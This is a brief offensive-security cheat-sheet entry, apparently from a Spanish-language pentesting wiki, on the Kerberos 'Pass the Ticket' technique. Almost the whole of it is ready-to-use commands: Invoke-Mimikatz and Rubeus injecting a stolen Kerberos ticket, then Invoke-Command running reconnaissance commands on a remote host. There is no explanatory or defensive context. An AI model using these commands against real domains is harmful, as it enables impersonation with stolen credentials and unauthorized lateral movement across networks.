Pass the Ticket (PtT)

Invoke-Mimikatz

Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'
Invoke-Command -ComputerName <computer-name> -ScriptBlock {hostname; whoami; ipconfig}

Rubeus

.\Rubeus.exe ptt /ticket:<ticket-base64>

Última actualización